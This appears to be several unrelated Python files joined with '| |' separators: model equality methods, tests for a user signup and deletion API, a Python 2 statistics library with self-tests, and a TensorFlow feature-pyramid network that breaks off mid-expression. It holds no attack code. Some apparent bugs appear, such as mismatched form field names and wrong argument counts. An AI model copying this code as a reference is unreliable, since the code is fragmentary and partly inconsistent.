def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| |
#!/usr/bin/env python3
import sys
import requests
import json
import unittest
import datetime
from util import TestCase
import common
import config
class TestApiUserSignup(TestCase):
url = "%s/api/users/signup/"%(config.base_url,)
def test_account(self):
data = {
'email': config.user_test_email,
'passwd': config.user_test_password,
'rpasswd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'account not in form',
}
}
self.assertEqualR(res, expect_result)
data['account'] = ''
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'value of account: "" should not be empty value',
}
}
self.assertEqualR(res, expect_result)
def test_email(self):
data = {
"account": config.user_test_account,
"passwd": config.user_test_password,
"repasswd": config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'email not in form',
}
}
self.assertEqualR(res, expect_result)
data['email'] = ''
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'value of email: "" should not be empty value',
}
}
self.assertEqualR(res, expect_result)
def test_passwd(self):
data = {
'email': config.user_test_email,
'account': config.user_test_account,
'rpasswd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'passwd not in form',
}
}
self.assertEqualR(res, expect_result)
data['passwd'] = ''
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'value of passwd: "" should not be empty value',
}
}
self.assertEqualR(res, expect_result)
def test_repasswd(self):
data = {
'email': config.user_test_email,
'account': config.user_test_account,
'passwd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'repasswd not in form',
}
}
self.assertEqualR(res, expect_result)
data['repasswd'] = ''
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'value of repasswd: "" should not be empty value',
}
}
self.assertEqualR(res, expect_result)
def test_passwd_and_repasswd(self):
data = {
'email': config.user_test_email,
'account': config.user_test_account,
'passwd': config.user_test_password,
'repasswd': config.user_test_password + str(datetime.datetime.now()),
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'Confirm Two Password',
}
}
self.assertEqualR(res, expect_result)
def test_user_signup(self):
### if exist test account remove it
data = {
"account": config.user_test_account,
"passwd": config.user_test_password,
}
res = requests.post("%s/api/users/signin/"%(config.base_url), data=data)
res.connection.close()
if res.status_code == 200:
admin_info = common.get_user_info({'account': config.user_admin_account, 'passwd': config.user_admin_password})
test_info = common.get_user_info({'account': config.user_test_account, 'passwd': config.user_test_password})
delete_url = '%s/api/users/%s/'%(config.base_url, test_info['id'])
data = {
'token': admin_info['token']
}
res = requests.delete(delete_url, data=data)
res.connection.close()
### sign 'test'
data = {
'email': config.user_test_email,
'account': config.user_test_account,
'passwd': config.user_test_password,
'repasswd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 200,
"body": {
"msg": '',
}
}
self.assertEqualR(res, expect_result)
### sign 'test' account again
data = {
'email': config.user_test_email + str(datetime.datetime.now()),
'account': config.user_test_account,
'passwd': config.user_test_password,
'repasswd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'Account Exist',
}
}
self.assertEqualR(res, expect_result)
### sign 'test' email again
data = {
'email': config.user_test_email,
'account': config.user_test_account + str(datetime.datetime.now()),
'passwd': config.user_test_password,
'repasswd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 400,
"body": {
"msg": 'Email Exist',
}
}
self.assertEqualR(res, expect_result)
### 'test' delete 'test'
admin_info = common.get_user_info({'account': config.user_admin_account, 'passwd': config.user_admin_password})
test_info = common.get_user_info({'account': config.user_test_account, 'passwd': config.user_test_password})
delete_url = '%s/api/users/%s/'%(config.base_url, test_info['id'])
data = {
'token': test_info['token']
}
res = requests.delete(delete_url, data=data)
res.connection.close()
expect_result = {
"status_code": 403,
"body": {
"msg": 'Permission Denied',
}
}
self.assertEqualR(res, expect_result)
### 'admin' delete 'test'
admin_info = common.get_user_info({'account': config.user_admin_account, 'passwd': config.user_admin_password})
test_info = common.get_user_info({'account': config.user_test_account, 'passwd': config.user_test_password})
delete_url = '%s/api/users/%s/'%(config.base_url, test_info['id'])
data = {
'token': admin_info['token']
}
res = requests.delete(delete_url, data=data)
res.connection.close()
expect_result = {
"status_code": 200,
"body": {
"msg": {
'id': str(test_info['id'])
},
}
}
self.assertEqualR(res, expect_result)
### 'test' signup again
data = {
'email': config.user_test_email,
'account': config.user_test_account,
'passwd': config.user_test_password,
'repasswd': config.user_test_password,
}
res = requests.post(self.url, data=data)
res.connection.close()
expect_result = {
"status_code": 200,
"body": {
"msg": '',
}
}
self.assertEqualR(res, expect_result)
| |
from __future__ import division
import sys
from lib import *
from settings import *
sys.dont_write_bytecode = True
from numpy import log2
# XXXX what is k and why does Sym need it?
def test(f=None,cache=[]):
if f:
cache += [f]
return f
ok = no = 0
for t in cache:
print '#',t.func_name ,t.__doc__ or ''
prefix, n, found = None, 0, t() or []
while found:
this, that = found.pop(0), found.pop(0)
if this == that:
ok, n, prefix = ok+1, n+1,'CORRECT:'
else:
no, n, prefix = no+1, n+1,'WRONG :'
print prefix,t.func_name,'test',n
if ok+no:
print '\n# Final score: %s/%s = %s%% CORRECT' \
% (ok,(ok+no),int(100*ok/(ok+no)))
class Thing(object):
id = -1
def __init__(i,**fields) :
i.override(fields)
i.newId()
def newId(i):
i._id = Thing.id = Thing.id + 1
def also(i,**d) : return i.override(d)
def override(i,d): i.__dict__.update(d); return i
def __hash__(i) : return i._id
# def __eq__(i,j) : return i._id == j._id
#def __neq__(i,j) : return i._id != j._id
class Sym(Thing):
def __init__(i,inits=[],w=1):
i.newId()
i.selected=False
i.w=w
i.n,i.counts,i._also = 0,{},None
for symbol in inits: i + symbol
def __add__(i,symbol): i.inc(symbol, 1)
def __sub__(i,symbol): i.inc(symbol, -1)
def inc(i,x,n=1):
i._also = None
i.n += n
i.counts[x] = i.counts.get(x,0) + n
def norm(i,x): return x
def dist(i,x,y): return 0 if x==y else 1
def far(i,x): return '~!@#$%^&*'
def k(i) : return len(i.counts.keys())
def centroid(i): return i.mode()
def most(i): return i.also().most
def mode(i): return i.also().mode
def ent(i) : return i.also().e
def also(i):
if not i._also:
e,most,mode = 0,0,None
for symbol in i.counts:
if i.counts[symbol] > most:
most,mode = i.counts[symbol],symbol
p = i.counts[symbol]/i.n
if p:
e -= p*log2(p)
i._also = Thing(most=most,mode=mode,e=e)
#print "also", i._also.e
return i._also
@test
def symed():
"Counting symbols"
s=Sym(list('first kick I took was when I hit'))
return [ ' ' , s.mode()
, 7 , s.most()
, 3.628 , round(s.ent(),3) ]
class Sample(Thing):
"Keep a random sample of stuff seen so far."
def __init__(i,inits=[],opts=The.sample):
i._cache,i.n,i.opts,i._also = [],0,opts,None
for number in inits: i + number
def __add__(i,x):
i.n += 1
if len(i._cache) < i.opts.keep: # if not full
i._also = None
i._cache += [x] # then add
else: # otherwise, maybe replace an old item
if random.random() <= i.opts.keep/i.n:
i._also=None
i._cache[int(random.random()*i.opts.keep)] = x
def all(i) : return i._cache
def median(i) : return i.also().median
def iqr(i) : return i.also().iqr
def breaks(i) : return i.also().breaks
def also(i):
if not i._also:
lst = i._cache
n = len(lst)
lst = sorted(lst)
p= q = max(0, int(n*0.5) - 1)
r = int(n*(0.5 + i.opts.tiny))
dull = lst[r] - lst[p]
if not oddp(n) : q = p + 1
i._also = Thing(
median = (lst[p] + lst[q])*0.5,
iqr = lst[int(n*.75)] - lst[int(n*.5)],
breaks = chops(lst, opts=i.opts,
sorted=True, dull=dull))
return i._also
def chops(lst,sorted=False,dull=0,opts=The.sample):
def chop(bins, before, i):
rest = len(lst) - i
if rest < opts.enough:
return []
j = int(i + rest/bins)
while j < len(lst) and lst[j] <= before+dull:
j += 1
if j >= len(lst):
return []
now = lst[j]
return [now] + chop(bins - 1, now,j)
lst = lst if sorted else sorted(lst)
now = lst[0]
return [now] + chop(opts.bins, now,0)
@test
def sampled():
"Sampling up to 256 items in a distribution."
seed()
s0= Sample([1,1,2,2,3]*100,
sampleings(bins=2))
s1= Sample([1,1,1,2]*20)
s2= Sample([rand()**2 for _ in range(1000)],
sampleings(bins=5))
return [ [1,2], s0.breaks()
, [1,2], s1.breaks()
, [0, 0.09, 0.24, 0.41, 0.71],
gs2(s2.breaks())]
class Num(Thing):
"An accumulator for numbers"
def __init__(i,init=[], opts=The.sample,w=1):
i.newId()
i.selected=False
i.opts = opts
i.w=w
i.zero()
for x in init: i + x
for x in init: x=i.norm(i,x)
def zero(i):
i.lo,i.hi = 10**32,-10**32
i.some = Sample([],i.opts)
i.n = i.mu = i.m2 = 0
def __lt__(i,j):
return i.mu < j.mu
def n(i): return i.some.n
def sd(i) :
if i.n < 2: return i.mu
else:
return (max(0,i.m2)/(i.n - 1))**0.5
def centroid(i): return i.median()
def median(i): return i.some.median()
def iqr(i): return i.some.iqr()
def breaks(i): return i.some.breaks()
def all(i) : return i.some.all()
def __add__(i,x):
if i.some: i.some + x
if x > i.hi: i.hi = x
if x < i.lo: i.lo = x
i.n += 1
delta = x - i.mu
i.mu += delta/(1.0*i.n)
i.m2 += delta*(x - i.mu)
def __sub__(i,x):
i.some = None
if i.n < 2: return i.zero()
i.n -= 1
delta = x - i.mu
i.mu -= delta/(1.0*i.n)
i.m2 -= delta*(x - i.mu)
def dist(i,x,y,normalize=True):
if normalize:
x,y=i.norm(x),i.norm(y)
return (x-y)**2
def norm(i,x):
return (x - i.lo)/ (i.hi - i.lo + 0.00001)
def far(i,x):
return i.lo if x > (i.hi - i.lo)/2 else i.hi
def t(i,j):
signal = abs(i.mu - j.mu)
noise = (i.sd()**2/i.n + j.sd()**2/j.n)**0.5
return signal / noise
def cohen(i,j,small=The.math.brink.cohen):
v1 = i.sd()**2
v2 = j.sd()**2
a = (i.n - 1)*v1
b = (j.n - 1)*v2
c = i.n + j.n - 2
s = ((a+b)/c)**0.5
d = abs(i.mu - j.mu)
return d/s < small
def hedges(i,j,small=The.math.brink.hedges):
"Hedges effect size test."
num = (i.n - 1)*i.sd()**2 + (j.n - 1)*j.sd()**2
denom = (i.n - 1) + (j.n - 1)
sp = ( num / denom )**0.5
delta = abs(i.mu - j.mu) / sp
c = 1 - 3.0 / (4*(i.n + j.n - 2) - 1)
return delta * c < small
def bootstrap(i,j,conf = The.math.brink.conf,
b = The.math.bootstraps):
return bootstrap(i.all(), j.all(),conf=conf,b=b)
def a12(i,j,small=The.math.a12.small,
reverse=The.math.a12.reverse):
return a12(i.all(),j.all(),
reverse=reverse) < small
def ttest(i,j,conf=The.math.brink.conf,
threshold={.95:(( 1, 12.70 ),( 3, 3.182),
( 5, 2.571),(10, 2.228),
( 20, 2.086),(80, 1.99 ),
(320, 1.97 )),
.99:(( 1, 63.657),( 3, 5.841),
( 5, 4.032),(10, 3.169),
( 20, 2.845),(80, 2.64 ),
(320, 2.58 ))}):
def interpolate(x, points):
lo, hi = points[0], points[-1]
x1, y1 = lo[0], lo[1]
for x2,y2 in points[1:]:
if x1 <= x <= x2:
deltay = y2 - y1
deltax = (x- x1)*1.0/(x2- x1)
return y1 + deltay * deltax
x1,y1 = x2,y2
return hi[1]
def ttest1(n):
return interpolate(n,threshold[conf])
return ttest1(i.n + j.n - 2,conf) < i.t(j)
@test
def numed():
def push(x,n=0.2):
return x*(1 + n*rand())
n1=Num(x for x in range(30))
n2=Num(30+x for x in range(30))
lst1 = [x for x in range(30)]
n3, n4, n5 = Num(lst1), Num(), Num()
for x in lst1: n4 + x; n5 + x
for x in lst1: n5 - x
n6 = Num(lst1)
n7 = Num(push(x,0) for x in lst1)
n8 = Num(push(x,0.1) for x in lst1)
n9 = Num(push(x,1) for x in lst1)
return [14.5, n1.mu
,8.80, g2(n1.sd())
,14.5, n1.median()
,30, n2.lo
,59, n2.hi
,True, n3.sd() == n4.sd()
,0, n5.sd()
,0, n5.n
,True, n8.cohen(n7)
,False,n9.cohen(n7)
,True, n8.hedges(n7)
,False,n9.hedges(n7)
,True, n8.bootstrap(n7)
,False,n9.bootstrap(n7)
]
def bootstrap(y,z,
conf = The.math.brink.conf,
b = The.math.bootstraps):
"""The bootstrap hypothesis test from p220 to 223
of Efron's book 'Introduction to the bootstrap'."""
def someTestStatistic(one,two):
s1,s2 = one.sd(), two.sd()
delta = two.mu - one.mu
if s1+s2:
delta = delta/((s1/one.n + s2/two.n)**0.5)
return delta
def one(lst): return lst[ int(any(len(lst))) ]
def any(n) : return random.uniform(0,n)
x = y + z
xnum,ynum,znum = Num(x), Num(y), Num(z)
tobs = someTestStatistic(ynum,znum)
yhat = [y1 - ynum.mu + xnum.mu for y1 in y]
zhat = [z1 - znum.mu + xnum.mu for z1 in z]
bigger = 0.0
for i in range(b):
if someTestStatistic(
Num(one(yhat) for _ in yhat),
Num(one(zhat) for _ in zhat)) > tobs:
bigger += 1
return (bigger / b) <= conf
def a12gt(x,y):
if (y - x) > 0 : return 1
if (y - x) < 0 : return -1
else: return 0
def a12(lst1,lst2, gt= a12gt,
reverse= The.math.a12.reverse):
"how often is x in lst1 more than y in lst2?"
def loop(t,t1,t2):
while t1.k < t1.n and t2.k < t2.n:
h1 = t1.l[t1.k]
h2 = t2.l[t2.k]
h3 = t2.l[t2.k+1] if t2.k+1 < t2.n else None
if gt(h1,h2) < 0:
t1.k += 1; t1.gt += t2.n - t2.k
elif h1 == h2:
if h3 and gt(h1,h3) < 0:
t1.gt += t2.n - t2.k - 1
t1.k += 1; t1.eq += 1; t2.eq += 1
else:
t2,t1 = t1,t2
return t.gt*1.0, t.eq*1.0
#--------------------------
if reverse:
lst1,lst2 = lst2,lst1
lst1 = sorted(lst1, cmp=gt)
lst2 = sorted(lst2, cmp=gt)
n1 = len(lst1)
n2 = len(lst2)
t1 = Thing(l=lst1,k=0,eq=0,gt=0,n=n1)
t2 = Thing(l=lst2,k=0,eq=0,gt=0,n=n2)
gt,eq= loop(t1, t1, t2)
return (gt + eq/2)/(n1*n2)
def a12slow(lst1,lst2,rev=True):
"how often is x in lst1 more than y in lst2?"
more = same = 0.0
n1,n2=len(lst1),len(lst2)
for x in lst1:
for y in lst2:
if x==y : same += 1
elif rev and x > y : more += 1
elif not rev and x < y : more += 1
return (more+ 0.5*same) / (n1*n2)
@test
def a12eged():
imc=[0.0467727930535
,0.107422839506
,0.143231939163
,0.196049098581
,0.214018838305 #5
,0.295759259259
,0.336425231415
,0.400960144928
,0.42 #10
,0.546434017595
,0.600305405094
,0.608229508197
,0.722651845971
,0.733923766816 # 1-
,0.780266115803
,1.260375
,1.30157738095
,1.37680851064
,14.6394]
twopair=[0.0982951758956
,0.219622928726
,0.238561501328
,0.250163795386
,0.254009239283 #5
,0.271034376595
,0.311751739438
,0.314324693953
,0.477840168799
,0.522865519664 #10
,0.526105062302
,0.681018891615
,0.684250921515
,0.739683771336
,0.77830625818 #1
,0.812443866931
,0.850571338711
,1.42509168327
,1.4263754399]
print "a12eg>",a12slow(twopair,imc)
@test
def a12ed(small=The.math.a12.small,
repeats=100):
def twolists():
lst1 = [rand() for _ in range(repeats)]
lst2 = [rand() for _ in range(repeats)]
c1 = a12(lst1,lst2)
c2 = a12slow(lst1,lst2)
return c1==c2
seed()
return [ True, twolists(),
True, twolists(),
True, twolists(),
True, twolists(),
True, twolists()]
if __name__ == '__main__': eval(cmd())
| |
import tensorflow as tf
from networks.network import Network
from fcn.config import cfg
""" A network that produces dense features.
This particular network was heavily inspired by 'Feature Pyramid Networks for Object Detection' and adhere's more
closely to the paper than net_labeled_fpn.py
"""
class custom_network(Network):
def __init__(self):
self.inputs = cfg.INPUT
# self.input_format = input_format
self.num_output_dimensions = 2 # formerly num_classes
self.num_units = cfg.TRAIN.NUM_UNITS
self.scale = 1 / cfg.TRAIN.SCALES_BASE[0]
self.vertex_reg = cfg.TRAIN.VERTEX_REG
self.data_left = tf.placeholder(tf.float32, shape=[None, None, None, 3])
self.data_right = tf.placeholder(tf.float32, shape=[None, None, None, 3])
self.gt_flow = tf.placeholder(tf.float32, shape=[None, None, None, self.num_output_dimensions])
self.occluded = tf.placeholder(tf.int32, shape=[None, None, None, 1])
self.labels_left = tf.placeholder(tf.int32, shape=[None, None, None, None])
self.labels_right = tf.placeholder(tf.int32, shape=[None, None, None, None])
self.keep_prob = tf.placeholder(tf.float32)
self.queue_size = 20
# define a queue
self.q = tf.FIFOQueue(self.queue_size, [tf.float32, tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.float32])
self.enqueue_op = self.q.enqueue([self.data_left, self.data_right, self.gt_flow, self.occluded, self.labels_left, self.labels_right, self.keep_prob])
data_left, data_right, gt_flow, occluded, left_labels, right_labels, self.keep_prob_queue = self.q.dequeue()
self.layers = dict({'data_left': data_left, 'data_right': data_right, 'gt_flow': gt_flow, 'occluded': occluded,
'left_labels': left_labels, "right_labels": right_labels})
self.close_queue_op = self.q.close(cancel_pending_enqueues=True)
self.queue_size_op = self.q.size('queue_size')
self.trainable = cfg.TRAIN.TRAINABLE
if cfg.NET_CONF.CONV1_SKIP_LINK:
self.skip_1_mult = tf.constant(1.0, tf.float32)
else:
self.skip_1_mult = tf.constant(0.0, tf.float32)
if cfg.NET_CONF.CONV2_SKIP_LINK:
self.skip_2_mult = tf.constant(1.0, tf.float32)
else:
self.skip_2_mult = tf.constant(0.0, tf.float32)
if cfg.NET_CONF.CONV3_SKIP_LINK:
self.skip_4_mult = tf.constant(1.0, tf.float32)
else:
self.skip_4_mult = tf.constant(0.0, tf.float32)
self.setup()
def setup(self):
trainable = self.trainable
reuse = True
feature_len = 128
# scaled versions of ground truth
(self.feed('gt_flow')
.avg_pool(2, 2, 2, 2, name='flow_pool1')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_2x')
.avg_pool(2, 2, 2, 2, name='flow_pool2')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_4x')
.avg_pool(2, 2, 2, 2, name='flow_pool3')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_8x')
.avg_pool(2, 2, 2, 2, name='flow_pool4')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_16x'))
(self.feed('occluded').cast(tf.float32)
.avg_pool(2, 2, 2, 2, name='occluded_2x_avg')
.avg_pool(2, 2, 2, 2, name='occluded_4x_avg')
.avg_pool(2, 2, 2, 2, name='occluded_8x_avg')
.avg_pool(2, 2, 2, 2, name='occluded_16x_avg'))
self.feed('occluded_2x_avg').round().cast(tf.int32, name="occluded_2x")
self.feed('occluded_4x_avg').round().cast(tf.int32, name="occluded_4x")
self.feed('occluded_8x_avg').round().cast(tf.int32, name="occluded_8x")
self.feed('occluded_16x_avg').round().cast(tf.int32, name="occluded_16x")
(self.feed('left_labels').cast(tf.float32)
.avg_pool(2, 2, 2, 2, name='left_labels_2x_avg')
.avg_pool(2, 2, 2, 2, name='left_labels_4x_avg')
.avg_pool(2, 2, 2, 2, name='left_labels_8x_avg')
.avg_pool(2, 2, 2, 2, name='left_labels_16x_avg'))
self.feed('left_labels_2x_avg').round().cast(tf.int32, name="left_labels_2x")
self.feed('left_labels_4x_avg').round().cast(tf.int32, name="left_labels_4x")
self.feed('left_labels_8x_avg').round().cast(tf.int32, name="left_labels_8x")
self.feed('left_labels_16x_avg').round().cast(tf.int32, name="left_labels_16x")
(self.feed('right_labels').cast(tf.float32)
.avg_pool(2, 2, 2, 2, name='right_labels_2x_avg')
.avg_pool(2, 2, 2, 2, name='right_labels_4x_avg')
.avg_pool(2, 2, 2, 2, name='right_labels_8x_avg')
.avg_pool(2, 2, 2, 2, name='right_labels_16x_avg'))
self.feed('right_labels_2x_avg').round().cast(tf.int32, name="right_labels_2x")
self.feed('right_labels_4x_avg').round().cast(tf.int32, name="right_labels_4x")
self.feed('right_labels_8x_avg').round().cast(tf.int32, name="right_labels_8x")
self.feed('right_labels_16x_avg').round().cast(tf.int32, name="right_labels_16x")
# left tower
(self.feed('data_left')
.add_immediate(tf.constant(0.0, tf.float32), name='data_left_tap')
.conv(3, 3, 64, 1, 1, name='conv1_1', c_i=3, trainable=trainable)
.conv(3, 3, 64, 1, 1, name='conv1_2', c_i=64, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv1_l')
.max_pool(2, 2, 2, 2, name='pool1')
.conv(3, 3, 128, 1, 1, name='conv2_1', c_i=64, trainable=trainable)
.conv(3, 3, 128, 1, 1, name='conv2_2', c_i=128, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv2_l')
.max_pool(2, 2, 2, 2, name='pool2')
.conv(3, 3, 256, 1, 1, name='conv3_1', c_i=128, trainable=trainable)
.conv(3, 3, 256, 1, 1, name='conv3_2', c_i=256, trainable=trainable)
.conv(3, 3, 256, 1, 1, name='conv3_3', c_i=256, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv3_l')
.max_pool(2, 2, 2, 2, name='pool3')
.conv(3, 3, 512, 1, 1, name='conv4_1', c_i=256, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv4_2', c_i=512, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv4_3', c_i=512, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv4_3_l')
.max_pool(2, 2, 2, 2, name='pool4')
.conv(3, 3, 512, 1, 1, name='conv5_1', c_i=512, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv5_2', c_i=512, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv5_3', c_i=512, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv5_3_l'))
# 16x scaling input
(self.feed('conv5_3_l')
.conv(1, 1, feature_len, 1, 1, name='16_conv_1', c_i=512, elu=True)
# .conv(1, 1, 128, 1, 1, name='16_conv_2', c_i=128, elu=True, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='features_16x_l')
.deconv(4, 4, feature_len, 2, 2, name='upscale_16x_l', trainable=False))
# 8x scaling input
(self.feed('conv4_3_l')
.conv(1, 1, feature_len, 1, 1, name='8x_skip_cov_1', c_i=512, relu=False)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_8x_l'))
(self.feed('upscale_16x_l', 'skip_link_8x_l')
.add(name='8_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_8x_l')
.conv(3, 3, feature_len, 1, 1, name='8x_conv_2', relu=False)
.deconv(4, 4, feature_len, 2, 2, name='upscale_8x_l', trainable=False))
# 4x scaling input
(self.feed('conv3_l')
.conv(1, 1, feature_len, 1, 1, name='4x_skip_cov_1', c_i=256, relu=False)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_4x_l'))
(self.feed('upscale_8x_l', 'skip_link_4x_l')
.add(name='4_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_4x_l')
.conv(3, 3, feature_len, 1, 1, name='4x_conv_2', relu=False)
.deconv(4, 4, feature_len, 2, 2, name='upscale_4x_l', trainable=False))
# 2x scaling input
(self.feed('conv2_l')
.conv(1, 1, feature_len, 1, 1, name='2x_skip_cov_1', c_i=128, relu=False)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_2x_l'))
(self.feed('upscale_4x_l', 'skip_link_2x_l')
.add(name='2_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_2x_l')
.conv(3, 3, feature_len, 1, 1, name='2x_conv_2', relu=False)
.deconv(4, 4, feature_len, 2, 2, name='upscale_2x_l', trainable=False))
# # 1x scaling input
# (self.feed('conv1_l')
# .conv(1, 1, feature_len, 1, 1, name='1x_skip_cov_1', c_i=64, relu=False)
# .add_immediate(tf.constant(0.0, tf.float32), name='skip_link_1x_l'))
# (self.feed('upscale_2x_l', 'skip_link_1x_l')
# .add(name='1_add')
# .add_immediate(tf.constant(0.0, tf.float32), name='features_1x_l'))
# right tower
(self.feed('data_right')
.add_immediate(tf.constant(0.0, tf.float32), name='data_right_tap')
.conv(3, 3, 64, 1, 1, name='conv1_1', c_i=3, trainable=trainable, reuse=reuse)
.conv(3, 3, 64, 1, 1, name='conv1_2', c_i=64, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv1_r')
.max_pool(2, 2, 2, 2, name='pool1')
.conv(3, 3, 128, 1, 1, name='conv2_1', c_i=64, trainable=trainable, reuse=reuse)
.conv(3, 3, 128, 1, 1, name='conv2_2', c_i=128, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv2_r')
.max_pool(2, 2, 2, 2, name='pool2')
.conv(3, 3, 256, 1, 1, name='conv3_1', c_i=128, trainable=trainable, reuse=reuse)
.conv(3, 3, 256, 1, 1, name='conv3_2', c_i=256, trainable=trainable, reuse=reuse)
.conv(3, 3, 256, 1, 1, name='conv3_3', c_i=256, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv3_r')
.max_pool(2, 2, 2, 2, name='pool3')
.conv(3, 3, 512, 1, 1, name='conv4_1', c_i=256, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv4_2', c_i=512, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv4_3', c_i=512, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv4_3_r')
.max_pool(2, 2, 2, 2, name='pool4')
.conv(3, 3, 512, 1, 1, name='conv5_1', c_i=512, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv5_2', c_i=512, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv5_3', c_i=512, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv5_3_r'))
# 16x scaling input
(self.feed('conv5_3_r')
.conv(1, 1, feature_len, 1, 1, name='16_conv_1', c_i=512, elu=True, reuse=reuse)
# .conv(1, 1, 128, 1, 1, name='16_conv_2', c_i=128, elu=True, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='features_16x_r')
.deconv(4, 4, feature_len, 2, 2, name='upscale_16x_r', trainable=False))
# 8x scaling input
(self.feed('conv4_3_r')
.conv(1, 1, feature_len, 1, 1, name='8x_skip_cov_1', c_i=512, relu=False, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_8x_r'))
(self.feed('upscale_16x_r', 'skip_link_8x_r')
.add(name='8_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_8x_r')
.conv(3, 3, feature_len, 1, 1, name='8x_conv_2', relu=False, reuse=reuse)
.deconv(4, 4, feature_len, 2, 2, name='upscale_8x_r', trainable=False))
# 4x scaling input
(self.feed('conv3_r')
.conv(1, 1, feature_len, 1, 1, name='4x_skip_cov_1', c_i=256, relu=False, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_4x_r'))
(self.feed('upscale_8x_r', 'skip_link_4x_r')
.add(name='4_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_4x_r')
.conv(3, 3, feature_len, 1, 1, name='4x_conv_2', relu=False, reuse=reuse)
.deconv(4, 4, feature_len, 2, 2, name='upscale_4x_r', trainable=False))
# 2x scaling input
(self.feed('conv2_r')
.conv(1, 1, feature_len, 1, 1, name='2x_skip_cov_1', c_i=128, relu=False, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_2x_r'))
(self.feed('upscale_4x_r', 'skip_link_2x_r')
.add(name='2_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_2x_r')
.conv(3, 3, feature_len, 1, 1, name='2x_conv_2', relu=False, reuse=reuse)
.deconv(4, 4, feature_len, 2, 2, name='upscale_2x_r', trainable=False))
# # 1x scaling input
# (self.feed('conv1_r')
# .conv(1, 1, feature_len, 1, 1, name='1x_skip_cov_1', c_i=64, relu=False, reuse=reuse)
# .add_immediate(tf.constant(0.0, tf.float32), name='skip_link_1x_r'))
# (self.feed('upscale_2x_r', 'skip_link_1x_r')
# .add(name='1_add')
# .add_immediate(tf.constant(0.0, tf.float32), name='features_1x_r'))
self.feed('upscale_2x_l')
self.add_immediate(tf.constant(0.0, tf.float32), name='features_1x_l')
self.feed('upscale_2x_r')
self.add_immediate(tf.constant(0.0, tf.float32), name='features_1x_r')
with tf.device("/cpu:0"):
# triplet loss
# (self.feed(['features_1x_l', 'features_1x_r', 'gt_flow', 'occluded', 'left_labels', 'right_labels'])
# .triplet_flow_loss(margin=1.0, negative_radius=2, positive_radius=1, name="triplet_loss_1x"))
(self.feed(['features_2x_l', 'features_2x_r', 'gt_flow_2x', 'occluded_2x', 'left_labels_2x', 'right_labels_2x'])
.triplet_flow_loss(margin=1.0, negative_radius=2, positive_radius=1, name="triplet_loss_2x"))
# (self.feed(['features_4x_l', 'features_4x_r', 'gt_flow_4x', 'occluded_4x', 'left_labels_4x', 'right_labels_4x'])
# .triplet_flow_loss(margin=1.0, negative_radius=4, positive_radius=2, name="triplet_loss_4x"))
#
# (self.feed(['features_8x_l', 'features_8x_r', 'gt_flow_8x', 'occluded_8x', 'left_labels_8x', 'right_labels_8x'])
# .triplet_flow_loss(margin=1.0, negative_radius=5, positive_radius=2, name="triplet_loss_8x"))
#
# final_output = (self.get_output('triplet_loss_8x')[0] + self.get_output('triplet_loss_2x')[0] +
